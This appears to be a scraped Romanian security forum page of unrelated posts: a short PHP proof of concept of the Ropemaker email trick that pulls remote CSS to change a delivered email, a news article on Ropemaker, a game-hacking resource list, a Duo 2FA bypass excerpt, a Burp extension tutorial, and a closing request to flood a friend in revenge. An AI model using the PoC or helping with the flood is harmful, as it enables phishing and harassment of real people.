Leaderboard

Jeg. Sper sa se tavaleasca in chinuri. @aelius - respectivii se pare ca nu sunt interesati, arde-l pe jegos.

./ban

Asta e săgeată...

M-am jucat în ultimele ore cu ropemaker şi pot să zic că nu este cine ştie ce. POC: <?php $to = "destinatar@site.tld"; $subject = "ropemaker vulnerability"; $message =<<<START <html> <head> <style type="text/css">@import "http://link_catre_extern/style.css"</style> </head> <body> I heard you are a <span id="content"></span> boy </body> </html> START; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-Transfer-Encoding: quoted-printable\r\nContent-Type: text/html; charset=UTF-8\r\n"; mail($to,$subject,$message,$headers); În fişierul CSS avem aşa: #content:after { content:"good"; } După trimiterea mailului, se poate modifica fişierul css pentru a adăuga altceva (ex. bad). Din punctul meu de vedere, vulnerabilitatea este doar o problemă la nivelul programatorilor care au creat aplicaţiile şi nu ştiu să baneze importul de fişiere CSS din extern. Sunt foarte puţine aplicaţii care nu blochează spreadsheet-urile (vulnerabilitatea mi-a mers doar pe Outlook pe Android), deci, într-o lună, două, ar trebui să avem update-uri de securitate pe ele şi ropemaker să fie de domeniul trecutului.

My little sister's phone got stolen/lost a week ago. Yesterday, I got a strange text. Today, I peaked! (source) 6 days My little sister who is going to be a senior worked hard all summer to buy an iPhone, only to have it stolen (or fall out, she is still not entirely sure) out of her boyfriends car a week ago. She had not activated the find my iphone app so we reported it stolen but were pretty sure someone was just being gifted a free iphone courtesy of my sister's summer wages. On top of that, she had also bought a wallet case and lost all her ID's and cards as well. So yesterday I get this text from a strange number. I give my sister a quick call to make sure it is not her and effectively realize someone is fishing through her contacts or documents to get her password. I am well aware after the WTH that his is not my sister BTW. I was bored so I say to myself, why not have some fun. We will never get the phone back, but what the heck, might as well kill some time. I am certain that his or her insistence will at the very least make this an lengthy exchange. I'm convinced this person is humoring me and just stringing me along until I cave. No one can be buying this! .... Again, I am thinking, he is humoring me but I was like, let's see how long this lasts until he stops texting me back. AVERY FTW!!!! My sister got an email this morning. I have peaked! Behold! Sursa: https://imgur.com/r/funny/USjnb Nu stiu daca e real, dar e interesanta ideea.

The Ultimate Online Game Hacking Resource A curated list of tutorials/resources for hacking online games! From dissecting game clients to cracking network packet encryption, this is a go-to reference for those interested in the topic of hacking online games. I'll be updating this list whenever I run across excellent resources, so be sure to Watch/Star it! If you know of an excellent resource that isn't yet on the list, feel free to email it to me for consideration. Blog Posts, Articles, and Presentations Title/Link Description KeyIdentity's Pwn Adventure 3 Blog Series A series of blog posts detailing various approaches to hacking Pwn Adventure 3. How to Hack an MMO An article from 2014 providing general insight into hacking an online game. Reverse Engineering Online Games - Dragomon Hunter An in-depth tutorial showing how to reverse engineer online games via the game Dragomon Hunter. Hacking/Exploiting/Cheating in Online Games (PDF) A presentation from 2013 that delves deeply into hacking online games, from defining terminology to providing code examples of specific hacks. Hacking Online Games A presentation from 2012 discussing various aspects of hacking online games. For 20 Years, This Man Has Survived Entirely by Hacking Online Games A hacker says he turned finding and exploiting flaws in popular MMO video games into a lucrative, full-time, job. Hackers in Multiplayer Games A Reddit post discussing hacking in multiplayer games. Reverse Engineering Network Protocols A very helpful comment from a Reddit post inquiring about reversing network protocols. Deciphering MMORPG Protocol Encoding An informative discussion from a question on Stack Overflow. Reverse Engineering of a Packet Encryption Function of a Game An informative discussion from a question on StackExchange. Videos Title/Link Description How to Hack Local Values in Browser-Based Games with Cheat Engine This video teaches you how to find and change local values (which might appear as server-based values) in browser-based games. Reverse-Engineering a Proprietary Game Server with Erlang This talk details advantages Erlang has over other languages for reverse engineering protocols and analyzing client files. A live demo showcasing some of these tools and techniques is also given. DEFCON 19: Hacking MMORPGs for Fun and Mostly Profit This talk presents a pragmatic view of both threats and defenses in relating to hacking online games. Books Title/Link Description Game Hacking Game Hacking shows programmers how to dissect computer games and create bots. Attacking Network Protocols Attacking Network Protocols is a deep-dive into network vulnerability discovery. Practical Packet Analysis, 3rd Edition Practical Packet Analysis, 3rd Ed. teaches you how to use Wireshark for packet capture and analysis. Exploiting Online Games: Cheating Massively Distributed Systems This book takes a close look at security problems associated with advanced, massively distributed software in relation to video games. Online Game Hacking Forums Title/Link Description Guided Hacking Discussion of multiplayer and single-player game hacks and cheats. UnKnoWnCheaTs Forum Discussion of multiplayer game hacks and cheats. MPGH (Multi-Player Game Hacking) Forum Discussion of multiplayer game hacks and cheats. ElitePVPers Discussion of MMO hacks, bots, cheats, guides and more. OwnedCore An MMO gaming community for guides, exploits, trading, hacks, model editing, emulation servers, programs, bots and more. Sursa: https://github.com/dsasmblr/hacking-online-games/

Security researchers are warning of a new, easy-to-exploit email trick that could allow an attacker to turn a seemingly benign email into a malicious one after it has already been delivered to your email inbox. Dubbed Ropemaker (stands for Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky), the trick was uncovered by Francisco Ribeiro, the researcher at email and cloud security firm Mimecast. A successful exploitation of the Ropemaker attack could allow an attacker to remotely modify the content of an email sent by the attacker itself, for example swapping a URL with the malicious one. This can be done even after the email has already been delivered to the recipient and made it through all the necessary spam and security filters, without requiring direct access to the recipient’s computer or email application, exposing hundreds of millions of desktop email client users to malicious attacks. Ropemaker abuses Cascading Style Sheets (CSS) and Hypertext Markup Language (HTML) that are fundamental parts of the way information is presented on the Internet. Since CSS is stored remotely, researchers say an attacker can change the content of an email through remotely initiated changes made to the desired 'style' of the email that is then retrieved remotely and presented to the user, without the recipient, even tech savvy users, knowing about it. According to the researchers, the Ropemaker attack could be leveraged depending upon the creativity of the threat actors. For instance, attackers could replace a URL that originally directed the user to a legitimate website by a malicious one that sends the user to a compromised site designed to infect users with malware or steal sensitive info, such as their credentials and banking details. While some systems are designed to detect the URL switch preventing users from opening up the malicious link, other users could be left at a security risk. Another attack scenario, called "Matrix Exploit" by the Mimecast, is more sophisticated than the "Switch Exploit", and therefore much harder to detect and defend against. In a Matrix Exploit attack, attackers would write a matrix of text in an email and then use the remote CSS to selectively control what is displayed, allowing the attacker to display whatever they want—including adding malicious URLs into the body of the email. This attack is harder to defend against because the initial email received by the user does not display any URL, most software systems will not flag the message as malicious. Although the security firm has not detected the Ropemaker attack in the wild, it believes that this doesn't mean for sure the attack is "not being used somewhere outside the view of Mimecast." According to the security firm, Ropemaker could be used by hackers to bypass most common security systems and trick even the tech savvy users into interacting with a malicious URL. To protect themselves from such attacks, users are recommended to rely on web-based email clients like Gmail, iCloud and Outlook, which aren't affected by Ropemaker-style CSS exploits, according to Mimecast. However, email clients like the desktop and mobile version of Apple Mail, Microsoft Outlook, and Mozilla Thunderbird are all vulnerable to the Ropemaker attack. Via https://thehackernews.com/2017/08/change-email-content.html

Leveraging Duo Security’s Default Configuration to Bypass Two-Factor Authentication " Few things are more frustrating as an attacker than running up against widely implemented two-factor authentication (2FA). Even with valid credentials, without a valid two-factor authentication code or push acknowledgement, logging in to a protected service and abusing its capabilities or harvesting information isn’t possible. But what if instead of attacking the application, we first attacked how the two-factor authentication was implemented? In this blog post, we’ll discuss how one particular 2FA solution – by Duo Security – can have its default configuration leveraged to allow a log in without 2FA and how to mitigate against this tactic. " Source: https://appsecconsulting.com/blog/leveraging-duo-securitys-default-configuration-to-bypass-two-factor-authent

Adapting Burp Extensions for Tailored Pentesting Burp Suite is privileged to serve as a platform for numerous extensions developed and shared by our community of users. These expand Burp’s capabilities in a range of intriguing ways. That said, many extensions were built to solve a very specific problem, and you might have ideas for how to adapt an extension to better fulfil your needs. Altering third party Burp extensions used to be pretty difficult, but we’ve recently made sure all Burp extensions are open source and share a similar build process. In this post, I’ll show you just how easy it’s become to customize an extension and build a bespoke Burp environment for effective and efficient audits. I’ll personalize the Collaborator Everywhere extension by making it inject extra query parameters that are frequently vulnerable to SSRF, as identified by Bugcrowd for their excellent HUNT extension. Development Environment Prerequisites First, create your development environment. To edit an extension written in Java, you’ll need to install the Java JDK and Gradle. Extensions written in Python and Ruby don’t have any equivalent requirements, but Git is always useful. This is all you’ll need to build the majority of Burp extensions - Gradle will automatically handle any extension-specific dependencies for you. I’ll use Windows because it’s reliably the most awkward development environment. Obtain code The next step is to obtain the code you want to hack up. Find your target extension on https://portswigger.net/bappstore and click the ‘View Source Code’ button. This will land you on a GitHub Page something like https://github.com/portswigger/collaborator-everywhere To get the code, either click download to get a zip or open a terminal, type git clone https://github.com/portswigger/collaborator-everywhere, and cd into the new folder. Verify environment (Java only) Before you make any changes, ensure you can successfully build the jar and load it into Burp. To find out how to build the jar, look for the BuildCommand line in the BappManifest.bmf file. For Collaborator Everywhere, it’s simply gradle fatJar. The EntryPoint line shows where the resulting jar will appear. Apply & test changes If you can load the freshly built jar into Burp and it works as expected, you’re ready to make your changes and rebuild. Collaborator Everywhere reads its payloads from resources/injections, so I’ve simply added an extra line for each parameter I want to inject. For example, the following line adds a GET parameter called 'feed', formatted as a HTTP URL: param,feed,http://%s/ If a particular payload is causing you grief, you can comment it out using a #. The extension Flow may come in useful for verifying your modifications work as expected - it shows requests made by all Burp components, including the scanner. Here, we can see our modified extension is working as intended: Finally, be aware that innocuous changes may have unexpected side effects. Conclusion If you feel like sharing your enhanced extension with the community, feel free to submit your changes back to the PortSwigger repository as a pull request, or release them as a fork. I haven’t pushed my Collaborator Everywhere tweak into an official release because the extra parameters unfortunately upset quite a few websites. Some extensions may be more difficult to modify than others, but we’ve seen that with a little environment setup, you can modify Burp extensions with impunity. Enjoy - @albinowax Posted by James Kettle at 2:47 PM Sursa: http://blog.portswigger.net/2017/08/adapting-burp-extensions-for-tailored.html

Vinzi cu picior cu tot ?

Nytro,vreau sa ii dau flood unui prieten care m-a enervat si vreau o razbunare calumea